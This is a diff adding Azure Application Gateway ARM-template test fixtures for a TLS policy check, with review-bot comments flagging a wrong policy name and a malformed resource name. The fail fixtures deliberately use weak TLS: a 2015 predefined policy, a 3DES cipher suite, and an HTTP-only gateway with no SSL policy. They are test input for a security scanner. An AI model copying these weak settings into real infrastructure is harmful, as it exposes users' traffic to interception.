+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_policyName_fail3", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": 
{ + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Predefined", + "policyName": "20150501" + } + } + } + ] +} 
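Review bot: `"policyName": "20150501"` is not one of the Application Gateway predefined policy names; the 2015 policy is AppGwSslPolicy20150501. If the check decides by comparing policyName against the known predefined names, this fixture fails only because the name is unrecognized, not because the weak 2015 policy is selected, so the case the file name promises is not actually covered. Suggest `"policyName": "AppGwSslPolicy20150501"`, mirroring the `AppGwSslPolicy20220101S` form used in with_policyName_pass1.json.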
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json
new file mode 100644
index 00000000000..e7ac9fa7562
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json
@@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "[defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_policyName_pass1", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": 
{ + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Predefined", + "policyName": "AppGwSslPolicy20220101S" + } + } + } + ] +} 
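Review bot: The virtualNetworks resource has `"name": "[defoult"` — a leading `[` marks an ARM template expression, and this one is unterminated. The sibling fixtures use the plain string `defoult`; the stray bracket looks like a typo and may trip the ARM expression evaluator before the applicationGateways resource is reached, making the pass result depend on how the parser handles a malformed expression. Change it to `"name": "defoult"` (or better `"[variables('virtualNetworkName')]"`, which dependsOn already references) so the fixture is valid ARM.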
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json
new file mode 100644
index 00000000000..f735d773f77
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json
@@ -0,0 +1,233 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2018-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_protocolversion_and_cipher_fail2", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", 
+ "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Custom", + "minProtocolVersion": "TLSv1_2", + "cipherSuites": [ + 
"TLS_AES_128_GCM_SHA256","TLS_AES_256_GCM_SHA384",
+ "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
+ "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
+ "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json
new file mode 100644
index 00000000000..1e51ad85903
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json
@@ -0,0 +1,233 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_protocolversion_and_cipher_pass", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + 
"properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Custom", + "minProtocolVersion": "TLSv1_2", + "cipherSuites": [ + 
"TLS_AES_128_GCM_SHA256",
+ "TLS_AES_256_GCM_SHA384",
+ "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
+ "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
+ ]
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json
new file mode 100644
index 00000000000..a0bb9a2a128
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json
@@ -0,0 +1,276 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "minValue": 1, + "maxValue": 10, + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddressDefault": { + "type": "string", + "metadata": { + "description": "IP Address of Default Backend Server" + } + }, + "backendIpAddressForPathRule1": { + "type": "string", + "metadata": { + "description": "IP Address of Backend Server for Path Rule 1 match" + } + }, + "backendIpAddressForPathRule2": { + "type": "string", + "metadata": { + "description": "IP Address of Backend Server for Path Rule 2 match" + } + }, + "pathMatch1": { + "type": "string", + "metadata": { + "description": "Path match string for Path Rule 1" + } + }, + "pathMatch2": { + "type": "string", + "metadata": { + "description": "Path match string for Path Rule 2" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2020-08-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2020-08-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "[variables('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "without_sslPolicy_fail", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendPublicIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": 
"appGatewayFrontendPort80", + "properties": { + "Port": 80 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPoolDefault", + "properties": { + "BackendAddresses":[ + { + "IpAddress": "[parameters('backendIpAddressDefault')]" + } + ] + } + }, + { + "name": "appGatewayBackendPool1", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddressForPathRule1')]" + } + ] + } + }, + { + "name": "appGatewayBackendPool2", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddressForPathRule2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendPublicIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort80')]" + }, + "Protocol": "Http" + } + } + ], + "urlPathMaps": [ + { + "name": "urlPathMap1", + "properties": { + "defaultBackendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPoolDefault')]" + }, + "defaultBackendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + }, + "pathRules": [ + { + "name": "pathRule1", + "properties": { + "paths": [ + "[parameters('pathMatch1')]" + ], + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool1')]" + 
}, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + }, + { + "name": "pathRule2", + "properties": { + "paths": [ + "[parameters('pathMatch2')]" + ], + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool2')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ] + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "PathBasedRouting", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "urlPathMap": { + "id": "[resourceId('Microsoft.Network/applicationGateways/urlPathMaps',variables('applicationGatewayName'), 'urlPathMap1')]" + } + } + } + ] + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/empty_disabled_rules_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/empty_disabled_rules_pass.json new file mode 100644 index 00000000000..3fdb0f7e8b7 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/empty_disabled_rules_pass.json 
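Review bot: The failing fixture's gateway only exposes an `Http` listener on `appGatewayFrontendPort80`, so the absent `sslPolicy` coincides with a configuration that terminates no TLS at all, and this fixture does not show whether the check also fails a gateway whose policy is present but weak. A sibling fixture with `"sslPolicy": { "policyType": "Predefined", "policyName": "AppGwSslPolicy20150501" }` (or a `Custom` policy with `"minProtocolVersion": "TLSv1_0"`) would pin that path; it may exist outside this chunk. Separately, the resource is named `without_sslPolicy_fail` while every `resourceId(...)` inside it resolves through `variables('applicationGatewayName')` = `applicationGateway1`, so the template would not deploy as written — harmless for a static scan, but aligning the variable with the resource name keeps the fixture honest.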
@@ -0,0 +1,254 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.15.31.15270", + "templateHash": "7253194970749033988" + } + }, + "parameters": { + "adminUsername": { + "type": "string", + "metadata": { + "description": "Admin username for the backend servers" + } + }, + "adminPassword": { + "type": "securestring", + "metadata": { + "description": "Password for the admin account on the backend servers" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_B2ms", + "metadata": { + "description": "Size of the virtual machine." + } + } + }, + "variables": { + "virtualMachines_myVM_name": "myVM", + "virtualNetworks_myVNet_name": "myVNet", + "myNic_name": "net-int", + "ipconfig_name": "ipconfig", + "publicIPAddress_name": "public_ip", + "nsg_name": "vm-nsg", + "applicationGateways_myAppGateway_name": "myAppGateway", + "vnet_prefix": "10.0.0.0/16", + "ag_subnet_prefix": "10.0.0.0/24", + "backend_subnet_prefix": "10.0.1.0/24", + "AppGW_AppFW_Pol_name": "WafPol01" + }, + "resources": [ + + { + "type": "Microsoft.Network/applicationGateways", + "apiVersion": "2021-08-01", + "name": "[variables('applicationGateways_myAppGateway_name')]", + "location": "[parameters('location')]", + "properties": { + "sku": { + "name": "WAF_v2", + "tier": "WAF_v2", + "capacity": 2 + }, + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]" + } + } + } + ], + 